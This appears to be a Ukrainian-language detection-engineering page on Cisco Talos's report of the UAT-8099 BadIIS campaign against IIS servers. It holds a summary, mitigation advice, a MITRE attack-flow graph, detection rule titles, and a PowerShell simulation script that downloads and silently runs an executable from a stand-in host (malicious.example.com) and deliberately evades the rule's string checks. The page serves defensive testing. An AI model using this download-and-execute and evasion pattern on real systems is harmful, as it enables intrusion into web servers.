Стежити
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Cisco Talos повідомляє про нову кампанію UAT-8099, спрямовану на вразливі IIS вебсервери по всій Азії. Актори розгортають кастомізовані варіанти BadIIS, що містять регіональні ідентифікатори, і використовують вебшелли, PowerShell і інструмент дистанційного керування GotoHTTP для подальшого контролю. Постійність включає створення прихованих локальних облікових записів і використання легітимних утиліт червоної команди для злиття з адміністративною діяльністю. Майстерність частково збігається із раніше відомою операцією WEBJACK і, здається, спрямована на шахрайство з SEO, що впливає на сайти в Таїланді та В’єтнамі.
Розслідування
Talos розглянули телеметрію DNS, хеши файлів та шкідливі скрипти для відновлення ланцюга вторгнення. Аналітики спостерігали за вебшеллами у поєднанні з інструментами, такими як SoftEther VPN та EasyTier, а також з набором спеціалізованих утиліт, включаючи Sharp4RemoveLog, CnCrypt Protect, OpenArk64 і GotoHTTP. Два регіонально адаптовані стейни BadIIS — IISHijack та asdSearchEngine — були реверсно розроблені, виявивши жорстко кодування коди країн, вибіркове фільтрування запитів та XOR-зашифровану конфігурацію C2. Також був виявлений ELF-збір BadIIS з відповідними C2-доменами на VirusTotal.
Пом’якшення
Патчити виявлені вразливості IIS, посилити контроль фаєрволу веб-додатків та моніторити створення прихованих локальних облікових записів (наприклад, admin$, mysql$ та подібні). Виявити активність PowerShell, що завантажує чи запускає GotoHTTP, та блокувати вихідну комунікацію до відомих C2-доменів. Використовувати контролі кінцевих пристроїв для сповіщення про виконання виявлених спеціалізованих утиліт та про неочікуванні модифікації в межах каталогів вебсерверів.
Відповідь
Якщо виявлено індикатори, ізолюйте сервер, видаліть вебшелли та приховані облікові записи. Збережіть BadIIS бінарії та пов’язані скрипти для судової експертизи, і виконайте повний аналіз мережевого трафіку для ідентифікації C2-активності. Відновіть із відомої доброякісної резервної копії та підвищіть безпеку конфігурації IIS для запобігання повторному зараженню.
graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 %% Node definitions action_exploit_public_facing[“<b>Дія</b> – <b>T1190 Експлуатація публічно доступного застосунку</b><br/><b>Опис</b>: Експлуатація вразливостей у застосунках, доступних з Інтернету, для отримання початкового доступу.<br/><b>Деталі</b>: Компрометація серверів IIS через відомі вразливості та розгортання web shell.”] class action_exploit_public_facing action tool_web_shell[“<b>Інструмент</b> – <b>Назва</b>: Web Shell<br/><b>Опис</b>: Серверний скрипт, що забезпечує віддалене виконання команд.”] class tool_web_shell tool action_powershell_execution[“<b>Дія</b> – <b>T1059.001 PowerShell</b><br/><b>Опис</b>: Використання PowerShell для виконання команд і корисних навантажень.<br/><b>Команди</b>: whoami, tasklist, завантаження інструментів.”] class action_powershell_execution action tool_powershell[“<b>Інструмент</b> – <b>Назва</b>: PowerShell<br/><b>Опис</b>: Командний інтерпретатор і мова сценаріїв Windows.”] class tool_powershell tool action_system_info_discovery[“<b>Дія</b> – <b>T1082 Виявлення інформації про систему</b><br/><b>Опис</b>: Збір інформації про конфігурацію операційної системи та апаратного забезпечення.<br/><b>Команди</b>: збір системної інформації, фіксація контексту користувача.”] class action_system_info_discovery action action_create_account[“<b>Дія</b> – <b>T1136 Створення облікового запису</b><br/><b>Опис</b>: Створення прихованих локальних облікових записів для забезпечення стійкості.”] class action_create_account action action_valid_accounts[“<b>Дія</b> – <b>T1078 Дійсні облікові записи</b><br/><b>Опис</b>: Використання створених облікових записів для тривалого доступу та підвищення привілеїв.”] class action_valid_accounts action action_clear_event_logs[“<b>Дія</b> – <b>T1070.001 Очищення журналів подій Windows</b><br/><b>Опис</b>: Видалення журналів для приховування активності.<br/><b>Інструмент</b>: Sharp4RemoveLog.”] class action_clear_event_logs action tool_sharp4removelog[“<b>Інструмент</b> – <b>Назва</b>: Sharp4RemoveLog<br/><b>Опис</b>: Утиліта для очищення журналів подій Windows.”] class tool_sharp4removelog tool action_disable_event_logging[“<b>Дія</b> – <b>T1562.002 Вимкнення журналювання подій Windows</b><br/><b>Опис</b>: Порушення роботи захисних механізмів шляхом вимкнення журналювання.”] class action_disable_event_logging action action_obfuscate_files[“<b>Дія</b> – <b>T1027 Обфусковані файли або інформація</b><br/><b>Опис</b>: Використання XOR-шифрування (ключ 0x7A) для приховування конфігурації C2 та HTML-шаблонів.”] class action_obfuscate_files action malware_badiis[“<b>Шкідливе ПЗ</b> – <b>Назва</b>: BadIIS<br/><b>Опис</b>: Варіанти, що використовують XOR-обфускацію.”] class malware_badiis malware action_lateral_tool_transfer[“<b>Дія</b> – <b>T1570 Бічне передавання інструментів</b><br/><b>Опис</b>: Передавання інструментів і файлів у середовищі жертви.<br/><b>Інструменти</b>: бінарні файли BadIIS, GotoHTTP, SoftEther VPN, EasyTier.”] class action_lateral_tool_transfer action tool_gotohttp[“<b>Інструмент</b> – <b>Назва</b>: GotoHTTP<br/><b>Опис</b>: Передає файли через HTTP/HTTPS.”] class tool_gotohttp tool tool_softether[“<b>Інструмент</b> – <b>Назва</b>: SoftEther VPN<br/><b>Опис</b>: Багатохоповий проксі для тунелювання трафіку.”] class tool_softether tool tool_easytier[“<b>Інструмент</b> – <b>Назва</b>: EasyTier<br/><b>Опис</b>: Багатохоповий проксі для тунелювання трафіку.”] class tool_easytier tool action_proxy_multi_hop[“<b>Дія</b> – <b>T1090.003 Багатохоповий проксі</b><br/><b>Опис</b>: Використання проксі-інструментів для приховування джерела трафіку.”] class action_proxy_multi_hop action action_web_protocol_c2[“<b>Дія</b> – <b>T1071.001 Веб-протоколи</b><br/><b>Опис</b>: C2-комунікація через HTTP/HTTPS із використанням GotoHTTP.”] class action_web_protocol_c2 action %% Connections showing flow action_exploit_public_facing –>|використовує| tool_web_shell tool_web_shell –>|забезпечує| action_powershell_execution action_powershell_execution –>|використовує| tool_powershell tool_powershell –>|виконує| action_system_info_discovery action_system_info_discovery –>|призводить до| action_create_account action_create_account –>|забезпечує| action_valid_accounts action_valid_accounts –>|використовує| action_clear_event_logs action_clear_event_logs –>|використовує| tool_sharp4removelog action_clear_event_logs –>|також| action_disable_event_logging action_disable_event_logging –>|передує| action_obfuscate_files action_obfuscate_files –>|реалізовано через| malware_badiis malware_badiis –>|сприяє| action_lateral_tool_transfer action_lateral_tool_transfer –>|передає| tool_gotohttp action_lateral_tool_transfer –>|передає| tool_softether action_lateral_tool_transfer –>|передає| tool_easytier tool_softether –>|використовується для| action_proxy_multi_hop tool_easytier –>|використовується для| action_proxy_multi_hop action_proxy_multi_hop –>|підтримує| action_web_protocol_c2 tool_gotohttp –>|використовується в| action_web_protocol_c2
Потік атаки
Виявлення
Завантаження або вивантаження через Powershell (через cmdline)
Перегляд
Підозрілі файли в загальнодоступному профілі користувача (через file_event)
Перегляд
Можлива інвентаризація облікових записів або груп (через cmdline)
Перегляд
Виявлення виконання команд PowerShell для розгортання GotoHTTP [Windows Powershell]
Перегляд
Виявлення шкідливого програмного забезпечення BadIIS, що націлюється на сервера IIS для шахрайства із SEO [Вебсервер]
Перегляд
Виконання симуляції
Передумова: Телеметрія та перевірка базового рівня перед польотом повинні бути успішними.
-
Наратив атаки та команди:
Атакуючий отримав початковий доступ до зламаного вебсервера. Вони створюють приховану директорію під назвоюbad_iisв кореневій директорії IIS і розміщують спеціально названий бінарний файлів вебшеллуshell_xyz.exe(уникаючи дослівного рядка “web shell”). Використовуючи вебшелл, вони виконують Payload PowerShell, який завантажує бінарник GotoHTTP, перейменовує його вsvc_update.exe, і запускає його. Оскільки імена образів є закамуфльованими, перевіркиImage|containsпочаткового правила обходяться, хоча командний рядок все ще містить “PowerShell”. -
Скрипт тесту регресії: Цей скрипт відтворює описані кроки та створює телеметрію, подібну до атаки BadIIS без використання точних рядків, які правило відстежує.
# BadIIS simulation – obfuscated version $webRoot = "C:inetpubwwwroot" $payloadDir = Join-Path $webRoot "bad_iis" New-Item -Path $payloadDir -ItemType Directory -Force | Out-Null # Deploy a renamed web‑shell (binary copy of a known benign exe) $shellSrc = "$env:SystemRootSystem32notepad.exe" $shellDst = Join-Path $payloadDir "shell_xyz.exe" Copy-Item -Path $shellSrc -Destination $shellDst -Force # Simulate the web‑shell invoking PowerShell to download GotoHTTP $gotoUrl = "http://malicious.example.com/GotoHTTP.exe" $gotoDst = "C:WindowsTempsvc_update.exe" $psCommand = @" Invoke-WebRequest -Uri '$gotoUrl' -OutFile '$gotoDst'; Start-Process -FilePath '$gotoDst' -WindowStyle Hidden; "@ # Execute the PowerShell payload via the renamed web‑shell (process creation) Start-Process -FilePath $shellDst -ArgumentList "/c powershell.exe -NoProfile -ExecutionPolicy Bypass -Command `$psCommand`" -WindowStyle Hidden Write-Output "BadIIS simulation executed." -
Команди очищення: Видаляє закладені артефакти й відновлює середовище.
# Cleanup BadIIS simulation artifacts $webRoot = "C:inetpubwwwroot" $payloadDir = Join-Path $webRoot "bad_iis" Remove-Item -Path $payloadDir -Recurse -Force -ErrorAction SilentlyContinue $gotoDst = "C:WindowsTempsvc_update.exe" Remove-Item -Path $gotoDst -Force -ErrorAction SilentlyContinue Write-Output "Cleanup completed."